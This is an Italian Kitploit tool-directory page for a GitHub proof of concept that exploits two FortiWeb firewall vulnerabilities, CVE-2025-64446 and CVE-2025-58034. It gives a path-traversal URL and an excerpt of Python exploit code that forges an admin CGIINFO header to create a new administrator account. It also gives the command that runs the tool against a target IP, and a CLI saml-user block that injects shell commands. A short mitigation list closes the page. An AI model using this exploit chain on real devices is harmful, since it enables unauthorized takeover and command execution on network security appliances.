Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FORTIWEB_CVE-2025-64446-58034 — Vulnerabilità CVE-2025-64446 & CVE-2025-58034 | Kitploit
Strumenti/GitHubGitHub/eagle-nett/fortiweb_cve-2025-64446-58034
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubeagle-nett/fortiweb_cve-2025-64446-58034

FORTIWEB_CVE-2025-64446-58034

Vulnerabilità CVE-2025-64446 & CVE-2025-58034

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
4 mesi faNon ancora revisionato

Simulazione di sfruttamento di FortiWeb (CVE-2025-64446 e CVE-2025-58034)

Nota:

  • Questo documento ha solo scopo didattico e di ricerca sulla sicurezza.
  • Non utilizzare per attaccare sistemi senza autorizzazione.

1. Panoramica

FortiWeb è un dispositivo Web Application Firewall (WAF) utilizzato per proteggere le applicazioni web.

Nel 2025, sono state scoperte due vulnerabilità critiche:

  • CVE-2025-64446 – Bypass dell'autenticazione tramite Path Traversal
  • CVE-2025-58034 – OS Command Injection

2. Panoramica su CVE-2025-64446

VoceContenuto
Tipo di vulnerabilitàPath Traversal relativo
Bypass dell'autenticazione
CausaFortiWeb gestisce i percorsi in modo non rigoroso prima dell'autenticazione:

- Controllo degli accessi basato su stringa di percorso logico
- Non normalizza completamente il percorso
- Consente l'uso di ../ per accedere a risorse interne
DescrizioneAlcuni endpoint amministrativi possono essere accessibili senza autenticazione valida
Impatto- Bypass completo dell'autenticazione
- Accesso non autorizzato a funzioni admin
- Rottura del modello di autorizzazione
Versioni interessate- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

Esempio:

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. Panoramica su CVE-2025-58034


4. Processo sperimentale (POC)

4.1. Preparazione dell'ambiente:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Ciò aiuta a evitare conflitti di versione delle librerie, garantire la stabilità dell'ambiente di lavoro e limitare l'impatto sul sistema.

venv-git

4.2 Sfruttamento

Payload:

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Eseguire lo strumento con Python3:

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target>: L'indirizzo IP qui è il nome host del dispositivo FortiWeb.

exploit

Ottenuti username e password -> procedere con il login

login

connect

Sfruttamento riuscito e creato un nuovo account con privilegi di amministratore.

4.3 Sfruttamento di CVE-2025-58034 dopo l'accesso all'account

Dopo aver effettuato l'accesso con il nuovo account amministratore, l'attaccante può sfruttare la vulnerabilità di iniezione di comandi autenticata tramite richieste appositamente create o direttamente tramite l'interfaccia a riga di comando di FortiWeb CLI:

root@kitploit:~
config user saml-user

edit "`id`" ## inserire comando qui

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

FortiWeb uscirà dalla stringa di configurazione ed eseguirà il comando id durante la configurazione di saml-user.

5. Alcuni modi per mitigare le vulnerabilità

  • Aggiornare FortiWeb alla versione con patch.
  • Limitare l'accesso all'interfaccia di amministrazione.
  • Non esporre l'interfaccia di gestione su Internet.
  • Controllare la presenza di account amministratore anomali.

6. Ulteriori riferimenti

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
Scarica lo strumento
VoceContenuto
Tipo di vulnerabilitàOS Command Injection (CWE-78)
CausaFortiWeb gestisce l'input in modo non sicuro durante l'esecuzione di comandi di sistema:

- Nessuna validazione dell'input
- Mancanza di escape dei caratteri speciali
- Dati utente passati direttamente in comandi di sistema
DescrizioneLa vulnerabilità richiede autenticazione ma consente l'iniezione di comandi di sistema
Impatto- Esecuzione di comandi indesiderati
- Accesso a risorse di sistema
- Compromissione di integrità e disponibilità
Versioni interessate- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11